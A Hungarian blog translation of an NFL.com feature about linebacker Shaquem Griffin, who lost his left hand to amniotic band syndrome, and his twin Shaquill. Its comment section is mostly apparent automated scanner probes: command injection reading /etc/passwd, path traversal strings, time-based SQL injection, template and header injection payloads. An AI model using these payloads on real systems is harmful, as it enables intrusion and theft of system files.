A Shaquem Griffin sztori

Írta: r.baggio — 2018. január 28., 01:54

Az idei Senior Bowlt a legjobb edzésmenőnek megválasztott játékos életének bemutatásával búcsúztatjuk.

A Shaquem Griffin sztori


Az alábbi hosszú írás az nfl.com-os Chase Goodbread cikkének fordítása

 

ST. PETERSBURG, Florida -- A legjobb 50 dollár, amit Tangie Griffin valaha elköltött, abszolút a semmire ment.

Ennyit kért ugyanis a South Florida, hogy két egypetéjű ikerfia, Shaquill és Shaquem külön-külön részt vehessen az egyetem 2012-es focitáborában a lehetséges sportösztöndíj reményében. Hogy az eseményre való rövid út során St. Petersburg-i otthonukból a tampai kampuszra Shaquill kijelentse, nem fog beöltözni.

Éveken át az ikrek együtt fociztak, együtt edzettek, együtt remekeltek és most, együtt is toborozták őket.

De ezen a napon nem együtt esnek elbírálás alá.

Ha bármelyik edző a táborban kétségbe vonná Shaquem képességeit bal kezének hiányában, Shaquill legalább nem mutatja meg milyen lenne a helyzet két kézzel.

"Alapesetben azt mondtam volna, hogy 'Nem, 50 dollárt fizettem, ott leszel a pályán.' Mesélte Tangie Griffin. 'De volt benne valami, amilyen módon kijelentette'. Mondtam neki, 'Ha tényleg ezt akarod, tetszik az ötlet.' "

 

 

Egy perccel Shaquem előtt születve Shaquill mindig az óvó nagytesó szerepét játszotta az ikrek kapcsolatában. A Seattle Seahawks jelenlegi kezdő cornereként, újonc szezonját befejezve Shaquill épp csak elkezdett ezzel felhagyni.

De igazából felcserélné a szerepeket.

"Mindig, a mai napig azt kívánom, bárcsak velem történt volna meg helyette ez." mondja.

"Ez" az Amnionköteg-szindrómát takarja, mikor a születés előtt a belső magzatburok amnionszalagja rácsavarodik a magzat végtagjára és deformálódást, még rosszabb esetben csonkolást okoz.

Ikerterhesség esetén ez a szalag nyolc potenciális célpont közül választhatott Tangie Griffin méhében. Felcsavarodhatott volna egy lábra is egy kéz helyett, ami teljesen más életminőségi problémákat okozott volna, a sportolásról nem is beszélve. Eshetett volna a választása egyetlen ujjra is, mint az a szintén az idei drafton kiválasztható TE prospecttel, a wisconsini Tory Fumagalli-val történt.

És természetesen Shaquillt is érinthette volna.

Helyette Shaquem bal kezét vitte el, amit aztán 4 éves korában amputáltak teljesen, noha az eltávolított csonkot eleve túlzás lett volna kézfejnek nevezni. Egy minden érintésre fájdalommal reagáló szövetcsomó volt, funkcionalitás nélkül.

Shaquem most bátyja útját követve az NFL-ért küzd. A Senior Bowltól kezdve a játékosmegfigyelőknek nem kezének hiányát igyekszik megmutatni, hanem hogy miért is nincs erre a végtagjára igazán szüksége.

Shaquill úgy gondolja, hogy testvére volt az ideális jelölt az ezzel kapcsolatos kihívások leküzdésére. Végül is Shaquem volt kettejük közül az első, aki fára mászott. Shaquem lett 2016-ban az American konferencia Év védője. És ki más, mint Shaquem teremtette meg magának az esélyt, hogy a modern éra első egy kézzel bíró focistája legyen, akit az NFL-be draftolnak?

Shaquill nem biztos benne, hogy képes lett volna ugyanerre.

És ahogy Shaquem folyamatosan újabb és újabb gátakat tör át, hogy profivá válhasson, a fontosabb kérdés az: van egyáltalán bárki hozzá fogható?

Shaquill soha nem szólt egy szót sem. Formálódó éveiben, mikor a gyerekek a leginkább kíváncsiak, egyszer sem ment oda az anyjához azzal a kérdéssel, hogy mi van az öccse kezével,, még az amputáció után sem.

Tangie és a férje, Terry, hagyta Shaquillt, hogy amennyire csak lehet, maga értse meg a szituációt.

"Egy 4 évesnek nem igen magyarázod el, hogy mi történik. De azt leszögezed, hogy 'Többé nem érez fájdalmat.' mondta Tangie Griffin. "Nem részleteztem neki 4 évesen az amputációt, hiszen úgysem értette volna meg. De biztosítottam, hogy tudatában legyen, a testvére már nem gyötrődik."

Az éjszaka közepén Shaquem beleütött a Shaquillel megosztott emeletes ágy keretébe és üvöltve rohant a konyhába. Észveszejtő fájdalomban jobb kezébe vett egy kést, hogy maga vágja le a csonkot, a szülők alig tudták megakadályozni.

Shaquill csendben az ágyban maradt. Lebénult a felbolydulástól, félt megmozdulni is. Mikor nem tudott visszaaludni, Terry-vel az egyik szobában üldögélt, míg Tangie Shaquemet nyugtatta. Az anya a következő nap bevitte gyermekét az amputációra.

A nagy testvér Shaquill sose volt félénk megvédeni Shaquemet, ha szükséges volt. Erősen fülelt minden inzultálásra vagy öccsét ért gonosz viccelődésre, és igyekezett elejét venni az összes kegyetlenségnek az iskolaudvaron.

Ő nem találta a vicceket szórakoztatónak, viszont Shaquem gyakran igen.

Shaquem társai értetlenkedését bombabiztos mosolyával és humorérzékkel szerelte le és könnyen beilleszkedett.

Shaquill piszkálódás iránti intoleranciája egyszer az ikrek napközis centerében mutatkozott meg, 7 évesen, mikor ellökött egy lányt aki Shaquemet "uborkakezűnek" nevezte.

Shaquem számára ez nem volt zavaró és a szüleiknek sem.

"El kellett jutnunk Shaquillel arra a pontra, hogy megértse, ha Shaquemet ez nem bántja, sőt viccelődik vele, neki is kötelessége így viselkednie." mesélte Tangie.

Tartsd meg a szimpátiád. Add olyasvalakinek, aki akarja. Akinek kell. Valaki másnak, mint Shaquem Griffin.

A UCF linebackere eltökélt és az irányba is tart, hogy a következő néhány hónapban a megfigyelőknek bemutassa, amit Chris Wiesehan évek óta tud – ellenfél edzőjeként a hiányzó kézre rájátszani nem gyümölcsöző megoldás.

A Temple támadófalának trénere elégedett, hogy Griffin távozik az AAC csoportból. A UCF kezdőjeként tüske volt csak az Owls számára, két egymás elleni meccsükön 3 TFL-t, 3 levédekezett passzt, 1 interceptiont, 1 kiharcolt fumble-t és 1 sacket jegyzett.

"Mikor ellene játszol, nincsenek határok," árulta el Wiesehan. "Fantasztikus elánnal küzd és jól érti, hogyan használja ki testét és szerezzen egyensúlyi előnyt. Nyomásgyakorlói képessége és a blokkokról való elszakadása elit szintű."

Shaquem két rendkívül sikeres szezont tudott le pass rusher OLB-ként a UCF-en, de 185 centijével és közel 100 kilójával jelentősen alulméretezettnek számítana ezen a poszton az NFL-ben. A scoutok értékes special teamert látnak benne, védőként gyenge oldali LB-ként, esetleg SS-ként lehet esélye a profi karrierre.

Megfigyelői körökben egyre erősebb az a meggyőződés, hogy nemcsak draftolni fogják, hanem az 53-as keretszűkítést is túléli valahol fizikai képességei és attitűdje okán, ami pedig nem minden draftolt esetében kiváltság.

"Ez borítékolható." mondja egy NFC scout. "Láttam játékosokat két kézzel olyan ellenfelekkel szemben leblokkolni, akiket Shaquem gond nélkül megvert, mivel ő veleszületett módon erőszakos focista. Ilyen srácokat nehéz találni... Néha elhibáz egy-egy szerelést, mert nem tudja tökéletesen átkarolni a labdát cipelőt, viszont számos olyan szerelést csinál meg, melyet egy lazsálásra hajlamosabb ember nem. Belső motorja igen ritka."

Persze minden megfigyelőre, aki hajlandó Griffin mellett kiállni jut egy olyan, aki nem meri kockáztatni reputációját a kézfej hiányában.

"Lesz hezitálás, főleg a fiatalabb megfigyelőknél vagy azoknál, akik új helyen, új csapatnál vagy új GM alatt dolgoznak," figyelmeztetett az előbbi NFC scout. "Nyilvánvalóan egyeseknek problémát jelentene egy olyan igazolás, melyhez foghatót korábban még sose tettek."

Griffin szerelési hatékonysága fejlődött első és második kezdő idénye között. A Pro Football Focus szerint 2017-ben a kísérletek 13 százalékát rontotta el szemben az egy évvel korábbi 16 százalékhoz képest, bár a PFF alapján mindkét szám elmarad posztján az átlagtól.

Természetesen lesznek kételkedők tehát. Mindig is voltak.

Gyerekkori edzője, Terrell Holmes saját szemével látta hogy motiválta egy missed tackle Shaquemet nyolc éves játékosként.

"Az arcáról leolvasható volt, ha elhibázott egy szerelést, hogy úgy gondolta mindenki rögtön azt feltételezi majd, nem volt képes a helyes végrehajtásra." mondta Holmes. "Ilyenkor elárultam neki, hogy csak túl messze helyezkedett. De a következő játéknál hallhattad a közönség morajlását, mert valakit épp kiütött."

Shaquem általában nem foglalkozik a kérkedőkkel, megfogadta anélkül cáfol rájuk, hogy különösebben felhúzná magát.

Shaquill másrészről állandóan bosszankodott emiatt.

A St. Petersburg-i Lakewood Középiskolában Shaquem a pálya közepét felügyelte söprögetőként, Shaquill volt a cornerback. Ez gyakran Shaquillt az ellenfél oldalvonalához közel állította, ahol könnyen meghallhatta az esetenkénti zrikálódást vagy a sértő beszólásokat a vendég játékosoktól, sőt edzőiktől akár.

Az évek során főleg a felnőttek azok, akik Shaquillt kiborították érzéketlenségükkel, a gyerekeknél természetesebbnek tűnt a kíváncsiskodás. És ott volt, újra, hogy kénytelen legyen szembesülni a testvérét ért gyűlölködéssel éretlen felnőttek szájából.

"Hallhatta őket erről beszélni. 'Kiaknázzuk az egykezű sráccal adódó lehetőségeinket. Dobd csak az embere felé. Ő a gyenge pont,' " mesélte a Spartans edzője, Cory Moore.

És hogy reagált erre?

"Shaquill gondoskodott róla, hogy drágán megfizessenek ezért."

Amilyen különleges lenne az NFL karrier Shaquem számára, volt egy hasonló történet már régebben.

Igen régen.

A Boston Yanks az 1945-ös draft nyolcadik körében választotta ki Ellis Jones-t. Jones a labda mindkét oldalán játszott, OG-ként és LB-ként, és 1943-ban meghívást kapott a college all-star csapat Chicago Bears elleni gálamérkőzésére is. 11 évesen leesett egy fáról és szilánkosra tört a jobb karja. A végtag elüszkösödött, ezért nyolc hüvelykkel a váll alatt amputálni kellett.

"Fociztam a balesetem előtt is." idézte anno Jones-t a New York Times gyászjelentése. "Sose fordult meg a fejemben, hogy abba kellene hagynom a játékot. Vélhetően túlságosan buta voltam, hogy ilyenre gondoljak."

Nem gondolt erre Griffin sem.

Nem tehette meg.

Edzőik Shaquille-t jellemzik a ravaszabb játékosként, Shaquemet pedig mint bika a sisakban. Kettejük közül utóbbi a keményebb ütköző és az ízig-vérig linebacker.

"Mondani szoktuk neki, 'Nem ejtheted el a labdákat. Egyetlen egyet sem. Nincs kifogás – a nehezebb utat kell bejárnod. Ha a srácok 100 százalékot nyújtanak, neked 110-et kell,' " mesélte Andre Griffin, az ikrek 10 évvel idősebb bátyja. "Shaquem erre született."

A szülői stratégia Shaquem nevelésében az volt, hogy ne bánjanak vele másként, mintha két egészséges karja lenne. Terry irányította az ikrek atletikai felkészítését, és mindkettejüktől ugyanazt várta el. Saját kézzel hozott létre olyan kiegészítőket, ami segítette Shaquemet a testépítés terén. Az egyiket fekvenyomásnál, a másikat karedzéseknél használták.

"Őrült tudós volt a garázsban," mondta Shaquem. "Nem hiszem, hogy akadt bármi, amit nem tudott megoldani."

Néha esténként Griffin kalapáló vagy egyéb ilyesféle hangokra ébredt fel, melyek a garázsból jöttek, és abban a tudatban hajtotta álomra a fejét, hogy reggelre valami új eszköz várja majd. Ezeket a Lakewood High konditermébe is elvitte, ahol kizárólag Shaquill lehetett az edzőpartnere.

Mikor a UCF-re megérkezett, Shaquem az egyetemtől is kapott protézist a felkészülését segítendő. A UCF korábbi erőnléti trénere, Zach Duval két évvel ezelőtt Scott Frost főedzővel együtt vágott bele a munkába, ekkor Shaquem már három éve használta a speciális protézist. A látvány azonnal lenyűgözte.

"Csak leült, rátett egy kis kézfertőtlenítőt, majd 185 kilóval nyomott fekve. Bámulatos volt." mondta Duval. "Az összes húzógyakorlatán változtattunk. Shaquemnél minden a nyomásról szólt. A húzásokat pliometrikus, szalagos verziókra cseréltük. A feszülő szalagokkal már rendesen tudott dolgozni."

Duval, aki azóta már követte Frostot a Nebraskához is Lincolnba, 22 évnyi tapasztalattal a háta mögött nem egy élsportolóval dolgozott. Ebből négyet a Buffalo Bulls-nál töltött a Raiders sztár Khalil Mack trénereként, és munkamorál szempontjával kettejüket egy szintre tenné.

"Abban a tekintetben, ahogy minden napot ugyanazzal a keménységgel és küzdőszellemmel tudnak le, ők ketten viszik nálam a prímet." nyilatkozta Duval.

 

 

A testedzés mellett hosszú a lista, mely mindennapi feladatok igényelnek garázsban nem megépíthető dolgokat: találékonyságot, képzelőerőt és komoly mennyiségű türelmet és kitartást Shaquemtől.

Cipőfűző bekötése.

Öv felvétele.

Étel felvágása.

Mind ösztönösen kétkezes rutin másoknak, míg Shaquem külön-külön fejlesztette ki ezekre a saját technikáját.

"Nem sokat segít mikor látok valamit két kézzel megoldva. Ki kell találnom a magam módszerét." mondta Shaquem. "Valamit órákon át próbálok megoldani. De előbb vagy utóbb rájövök mi számomra a kényelmes, és onnantól mindig úgy csinálom. A cipőfűző bekötésénél a fűzőt a lábamhoz tűzöm, hogy a hurkot egyben tartsam. A kezemmel az első hurkot összecsomóztam, onnantól már flottul ment."

Egyszer egy nyaklánccal 45 percig szenvedett, mielőtt testvére segítségét kérte, de egy napra rá kiötölte, hogyan oldja meg ezt egyedül. Shaquillnek azt kellett megtanulnia, hogy egyensúlyozzon a segítőkészség és öccse mérhetetlen állhatatossága között.

Mikor lépjen közbe, mikor maradjon a háttérben.

"Láttad hogyan reagál egyes dolgokra, ez alapján megállapíthattad mikor jött el az idő besegíteni." mondta Shaquill. "Vannak szituációk, melyekkel megküzd és csak folytatja tovább újra és újra, frusztráció nélkül. Ekkor hagyod érvényesülni. Mikor ingerülten abbahagyja, mintha végleg letett volna róla, közbeléphetsz."

Az egyetlen dolog, amiről Shaquem csalódottan önként és visszafordíthatatlanul lemondott, az a golf. Ezzel mondjuk számos két(bal)kezes társa járt így.

Az ikrek közti kötelék igen erőteljes tud lenni. A Griffin-ikerpár köteléke bőven túl az erőteljesen egyenesen velejéig hatoló.

Az igazi gyújtópont kettejük kapcsolatában lakewoodi középiskolai végzős évük őszén és telén jött el, mikor az egyetemi edzők a toborzási ciklus végére igyekeznek pontot tenni. Az ország minden tájáról érkeztek ajánlatok Shaquill irányába, de egy sem Shaquemért. Az ok senkit nem lepett meg.

"Egyetemi edzők a meccsfelvételeket nézve észre se vették Shaquem hiányosságát, és ekkor még mindig mondták, hogy tárt karokkal fogadják mindkét testvért." emlékezett vissza Moore, a Lakewood főedzője. "És én szánt szándékkal nem mondtam semmit míg a meccsfelvételeken túl nem voltak. Aztán elárultam, hogy az egyikőjüknek nincs meg az egyik kézfeje és a beszélgetés ilyenkor általában vakvágányra terelődött."

Moore nem hagyta a toborzókat abban a tudatban távozni az irodájából, hogy Shaquemnek mindkét keze ép, mert az több kárt, mint hasznot okozhatott volna. Miért tegye ki Shaquemet egy olyan ajánlat iránt érzett izgalomnak és garantált csalódásnak, amit később úgy is visszavonnak? Nyilvánvalóan a signing day előtt kiderült volna, tehát Moore a game tape vizsgálatát követően őszintén beszélt a helyzetről.

Cserébe vele is őszinték voltak.

"Egyszerűen nem mehetek ezzel vissza a főedzőmhöz."

Ez volt a visszatérő refrén miután Moore figyelmeztette őket Shaquem amputációjáról.

Az ikrek némileg figyelemmel kísérték, hogy mely csapatok érdeklődnek Moore-nál, de a középiskolai mester nem minden esetben tudta nyílegyenesen tájékoztatni játékosait a kialakult helyzetről.

Az ikrek már az általános iskolában megegyeztek, hogy még az egyetemen is csapattársak lesznek, szóval Shaquill csak a páros ajánlatot fontolt meg vagy semmit. Anyjuk hallotta őket korábban erről beszélni, de egészen addig nem vette ezt komolyan, míg az Akron Zips egyik edzője fel nem hívta, hogy tényleg jól értette-e Shaquill álláspontját, aki udvariasan, ám határozottan kijelentette, egyedül nem megy sehova. Mikor nem tudták Shaquillt meggyőzni, hogy hagyja hátra Shaquemet, megpróbálták Tangie-t, hogy bírja jó szóra fiát és adja fel az ultimátumot.

Az anya ebből nem kért, minden toborzót azzal elhárítva, hogy maximálisan támogatja a kívánságukat, hiába szűkítette le ez jelentősen lehetőségeiket. Shaquill olyan iskolák ajánlataira mondott nemet a paktum miatt, mint a Florida, a Florida State vagy gyerekkori álma, a Miami. Egyes programok kategorikusan elzárkóztak, mások később meggondolták magukat és változtattak álláspontjukon. Ám amikor befutott a második ösztöndíjajánlat Shaquemnek, a testvérek mondtak nemet. A kezdeti vonakodás épp elég gyanút keltett a Shaquemmel kapcsolatos szándékai igaz mivoltáról. Az ikrek számára ez kizáró ok volt.

"Ettől csak még keményebben dolgoztam, mert mindkettőnknek a legjobb lehetőséget akartam megteremteni, bármi is legyen az." mondta Shaquem.

A UCF ajánlatát fontolták meg egyedül komolyan, így a Knights az AAC jövendőbeli két legjobb védőjét egy csapással szerezte meg.

Ezzel két vidám és elválaszthatatlan barátot tudhattak köreikben, akik sok tipikus ikrekre jellemző tulajdonság mellett néhány nehezen elmagyarázhatóval is bírtak. Egymástól függetlenül, mégis ugyanúgy öltözködtek, rejtélyes módon olvasták a másik gondolatát és ugyanazokat az ételeket szerették. Mindketten megőrülnek a családi spagettireceptért, ami szerintük a következő napi Sloppy Joe szendvicsekhez is tökéletesen passzol.

Moore úgy emlékezett, hogy a Griffinek furamód néha összeszedtek ugyan kisebb sérüléseket, melyek alapból nem ugyanazok voltak, de mindig nagyjából egyszerre történtek.

A Lakewood High atlétikai programjáért felelős Anthony Snead a Griffin-köteléket egyedi szemszögből tapasztalta meg. Az ikrek a futball helyett választhatták volna az atlétikát is, ha akarják, hármasugrásban, 4x100-as és 4x400-as váltókban igen kiemelkedtek. Utóbbi gárda bővelkedett a sztárokban: az ex-Vikings WR Rodney Adams-t Shaquill, majd Shaquem követte, a sort TJ Holmes zárta, aki az USA egyik legjobb 400 gátasa lett.

Snead sose gyakoroltatta a váltást az ikrekkel. Nem kellett.

"Az első alkalommal látva őket, minden flottul ment." mondta Snead. " Még a jelzést se tették le a rekortánra. Felkészülés során leteszel egy jelzőt a következő futónak segítségül, hogy a botos mozgását megítélve tudja, neki mikor kell elindulnia. Náluk nem volt erre szükség."

2014 augusztusának utolsó hétvégéje egy boldog, egyszer-az-életben élmény lehetett volna Shaquem számára. A Knights épp Írországban járt, hogy a Penn State ellen megkezdjék a szezont.

Itt és ekkor realizálta Shaquem, hogy George O'Leary stábjának döntése, miszerint mindkét iker teljes sportösztöndíjban részesül sem szólt másról, mint Shaquill aláírásának megkaparintásáról.

Shaquem redshirted státuszt kapott, Shaquill viszont nem, aminek köszönhetően került utóbbi egy év eltéréssel az NFL-be. Shaquem nem kérdőjelezte meg ezt a döntést, elfogadva, hogy plusz időre volt szüksége akkoriban. De egy esztendővel később tudatosult benne, mikor csapattársaival a dublini látványosságokban igyekezett elmerülni, hogy edzői terveiben ő már nem szerepel. Magyarázat nélkül a második sorból a harmadikba csúszott vissza, majd a scout teambe száműzték.

Ekkor már szeretett volna választ kapni az edzőktől, hogy mit tett, mi a probléma.

"De sose feleltek tisztán és őszintén." mondta. "A következő évben az idény előtt becsatlakoztak a transzferelt játékosok is, és azok a srácok, akik még a formációkat sem ismerték elém kerültek. Ezen a ponton egyetlen kérdés maradt, 'Hogyan léphetek le innen?' "

A helyzet még rosszabbra fordult. Az ikrek UCF-en töltött második szezonjuk alatt kénytelen voltak levágatni általános iskolás koruk óta növesztett rasztahajukat. A történet úgy ismert, hogy O'Leary utasította őket erre és nem aratott vele osztatlan sikert. Az igazság? Csupán Shaquemet kérte meg rá a főedző, a játéklehetőségre epedező játékos pedig ezt is bevállalta. A kezdő Shaquillt mindez nem érintette, Tangie elmondása szerint. Csak szolidaritásból ment el ő is fodrászhoz öccsével együtt.

A testvérpár közös célja egyazon iskolára beiratkozva, ahogy ők látták, az ezt lehetővé tevő edzői stáb által vált semmissé. O'Leary-vel való kapcsolatuk javíthatatlanul elmérgesedett.

Mikor hazatelefonáltak Tangie elmormolt egy gyors imát mielőtt felvette a telefont, mert tudta, hogy fiai nem boldogok. Shaquem nem csak azt fontolta meg, hogy máshova megy focizni, azt sem zárta ki, hogy átiratkozik a USF-re futóként és felhagy az amerikai futballal. Abban biztos volt, hogy képtelen még egy napig O'Leary csapatában játszani.

Közben az O'Leary-éra a végét járta. Előbb átmeneti atlétikai igazgatói pozíciójáról mondott le 2015 őszén, ezt követte két hétre rá önkéntes futballedzői nyugdíjba vonulása. A UCF akkor még négy jövendőbeli vereségre volt a 0-12-es, nyeretlen rémálomtól.

És nem csupán a Griffineket vesztette el, elvesztette a komplett csapatát is. Több játékosa a lemondás hírére örömujjongásban tört ki.

"Páran úgy gondolták, hogy ez rossz dolog, de nem úgy én és még sokan mások – rengetegen felszabadultak miatta." mondta Shaquem.

 

 

Shaquillt is közéjük vehetjük.

Legalább annyira zavarta őt is Shaquem cserepadra szorulása, mint testvérét, és mikor a transzfer ténye szinte biztossá vált, Shaquill is átgondolta a UCF-en kívüli opcióit.

A családtagok azonban könyörögve kérték Shaquemet, maradjon a UCF-en. Holmes, gyerekkori edzője már korábban is hallott pletykákat O'Leary idény végi távozásáról – ez egy igen rosszul kezelt nyílt titok volt – de nem érezte úgy, hogy illik ezt megosztania Shaquemmel, még akkor sem, ha korábbi tanítványa a körülmények áldozata.

"Annyit tanácsoltam, hogy ne adja fel," emlékezett vissza Holmes. "Megmondtam neki, hogy a balsorsból még valami jó is kisülhet."

Ez a valami Scott Frost volt.

A UCF új főedzője, akinek stábja más játékosoktól hallotta, hogy Shaquem át akar iratkozni, mindent megváltoztatott. Tiszta lapot nyitva Shaquemet kizárólag a teljesítménye alapján ítélte meg és játékosa így a legegyértelműbb érvvel szolgálhatott, mennyire előre lesajnálták őt O'Leary-ék. Egy szezon alatt a speciális csapategység perememberéből az AAC Év védőjévé avanzsált, 20 TFL-t, 11.5 sacket és 7 passzlevédekezést produkálva. Frost söprögetőből áthelyezte LB-nek, ahol Shaquem a legkomfortosabban érezte magát gyerekkora óta.

"Attól a naptól fogva, hogy Scott Frost megadta az esélyt, sose néztem vissza," mondta Shaquem.

Két évig volt kezdő, egyetemi karrierjére a Peach Bowlon begyűjtött MVP-címmel tette fel a koronát. Az újév első napján rendezett mérkőzésen a Knights az Auburnt győzte le. Griffin 12 szerelése és 3.5 TFL-je (1.5 sackkel) nagyban hozzájárult a UCF veretlen mérlegéhez (13-0), és ezzel a program nem hivatalos bajnoki címéhez.

Szenzációsan időzített záróakkord volt ez Shaquem részéről, akit egyre nagyobb draft előtti felhajtás övez.

Egy éve ilyenkor Shaquill nagyjából ismeretlen volt. Draftstátuszát szinte a semmiből kellett felépítenie, Senior Bowl meghívó nélkül lenyűgöznie a scoutokat. Az NFL Scouting Combine-on futott 4.4 alatti 40 yardja volt az első figyelemfelkeltő jel.

Shaquem profilja ezzel szemben teljes pompájában virágzik. Mint az első osztály egyetlen veretlen csapatának legjobb védője, senki figyelmét nem kerülheti el, és a Senior Bowllal csak javít reputációján. Egy megfigyelő szerint "nem létezik", hogy egy NFL GM még ne tudna róla ezen a ponton.

Alig egy éve Shaquill épp becsekkolt a tampai repülőtéren a Dallas-ba tartó járatra, hogy megkezdje a Michael Johnson Performance központban a felkészülést a combine-ra. Az ikrek összeölelkeztek a kapunál, realizálva, hogy egy új és fura fejezethez érkeztek. 21 évet töltöttek el egymás mellett vállvetve, lélekben és a futballpályán egyaránt, és életükben először útjaik különválnak. Shaquill dallas-i landolásának idején Shaquem már a UCF-en zokogott ahogy korábbi közös szobájukban testvére képeit vette le a falról.

"Már a repülőteret elhagyva igen zaklatott voltam, erre újra szembesülnöm kellett vele a képeket leszedve." mondta Shaquem. Hosszú ideig a bátyám sok jó döntést hozott kettőnk érdekében. Tudtam, hogy mostantól magamra vagyok utalva. Mintha egy filmben lettünk volna, olyan érzés volt látni felszállni őt arra a gépre."

A 12 hónap egymástól távol mindkettejüknek komoly tapasztalatszerzéssel járt, de különösen Shaquemnek. A Knights-nál még inkább vezérré vált, egészen addig elment, hogy a tavaly őszi edzőtáborra beköltözött a UCF futballkomplexumába. Szó szerint ott aludt, hogy jobban elmerülhessen a filmelemzésben.

Ez segített Shaquillnek is a Seahawks-nál eltöltött napi munkára való koncentrálásban. A szeparáció persze csak távolságban mérhető, nem érzelmileg. Shaquill továbbra is magában hordozza a bűntudatot két ép keze miatt. Az elmúlt évben ezen csak többet és többet elmélkedett.

"Úgy éreztem, hogy nekem lett volna muszáj átmennem mindazon fájdalmon és átélni az azzal járó dolgokat" mondta Shaquill. "Azt kívánom bárcsak átvehettem volna tőle. Bárcsak vállaimra helyezhettem volna ezeket a terheket."

Tangie Griffin elmorzsolt egy könnycseppet. Ismerős érzés. Valamikor ő is elgondolkozik, hogy mit tehetett volna, akár teherbe esése előtt, hogy megakadályozza a történteket.

"Anyaként az első, hogy magadat hibáztatod. Olyan kérdéseket teszel fel, hogy 'Mit csináltam rosszul? Helytelenül feküdtem az ágyon? Túl sokat fordultam az egyik oldalamra? Helyesen étkeztem? Miket csináltam?" mondta. "És nem értettem meg, hogy egypetéjű ikrekként, ahogy kifejlődnek és nagyobbak lesznek, nem marad sok helyük (a méhben). Nem néztem ennek egyből utána."

Hat évvel ezelőtt a USF edzőtáborában Shaquill úgy határozott, hogy nem veszi fel a felszerelést és hagyja testvérét egyedül érvényesülni. Shaquem pontosan így tett. Élete formáját hozta, hogy tényszerűek legyünk. Ő volt a legjobb DB a pályán azon a napon, újraértékelésre kényszerítve a Bulls stábját. A USF segédedzője, Vernon Hargreaves, a Tampa Bay 2016-os első körös választottjának apja félrehívta Griffinéket.

"Azt mondta, 'Nem tartottam Shaquemet jónak egészen máig. Elnézést kérek, hogy nem ajánlottuk fel neki ugyanazt, amit Shaquillnek, most viszont ezen változtatnánk.' " emlékezett vissza Tangie.

Shaquem megköszönte Hargreaves-nek a lehetőséget és kedvesen visszautasította. Nem tartottak rá igényt korábban, miért akarná ő a Bulls-t most?

Az úton hazafelé, a Tampát St. Pete-tel összekötő négy mérföldes Sunshine Skyway Bridge-en egy anya és két ikerfia felhőtlenül nevetett és álmélkodott Shaquill produkcióján.

Legjobb 50 dolláros beruházás valaha.


Hozzászólások

több mint 6 éve
Egon bá New England Patriots 13 — Saints GM
Nagy köszönet a cikkért!!!
Tipikusan BB pick lenne, alá Julien 😉

Akár azt gondolod, hogy képes vagy valamire, akár azt, hogy nem, mindenképpen igazad van. Henry Ford
JUST WIN!!!
több mint 6 éve
Nem rég olvastam az angol verziót, szép munka volt a fordítás, köszönet érte!
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'+response.write(9265730*9136039)+'
több mint 5 éve
Törölt felhasználó
"+response.write(9265730*9136039)+"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
&cat /etc/passwd&
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
'&cat /etc/passwd&'
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20 and sleep(4)
több mint 5 éve
Törölt felhasználó
"&cat /etc/passwd&"
több mint 5 éve
Törölt felhasználó
SomeCustomInjectedHeader:injected_by_wvs
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
cat /etc/passwd
több mint 5 éve
Törölt felhasználó
20 or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
`cat /etc/passwd`
több mint 5 éve
Törölt felhasználó
20' and sleep(4)='
több mint 5 éve
Törölt felhasználó
../../../../../../../../../../etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
${99787+99092}
több mint 5 éve
Törölt felhasználó
|cat /etc/passwd#
több mint 5 éve
Törölt felhasználó
20' and (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
268435455
több mint 5 éve
Törölt felhasználó
20" and sleep(4)="
több mint 5 éve
Törölt felhasználó
'|'ld
több mint 5 éve
Törölt felhasználó
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
"|"ld
több mint 5 éve
Törölt felhasználó
20' or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
/../..//../..//../..//../..//../..//etc/passwd.jpg
több mint 5 éve
Törölt felhasználó
1some_inexistent_file_with_long_name%00.jpg
több mint 5 éve
Törölt felhasználó
több mint 5 éve
Törölt felhasználó
20&n999813=v935907
több mint 5 éve
Törölt felhasználó
;cat /etc/passwd;
több mint 5 éve
Törölt felhasználó
20" or (sleep(4)+1) limit 1 --
több mint 5 éve
Törölt felhasználó
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
több mint 5 éve
Törölt felhasználó
 testasp.vulnweb.com/t/fit.txt?%00.jpg
több mint 5 éve
Törölt felhasználó
1e309
több mint 5 éve
Törölt felhasználó
testasp.vulnweb.com
több mint 5 éve
Törölt felhasználó
';cat /etc/passwd;'
több mint 5 éve
Törölt felhasználó
20'=sleep(4)='
több mint 5 éve
Törölt felhasználó
/etc/passwd
több mint 5 éve
Törölt felhasználó
'"\'\");|]*{
<>
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20"=sleep(4)="
több mint 5 éve
Törölt felhasználó
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
több mint 5 éve
Törölt felhasználó
";cat /etc/passwd;"
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
20
több mint 5 éve
Törölt felhasználó
||cat /etc/passwd
több mint 5 éve
Törölt felhasználó
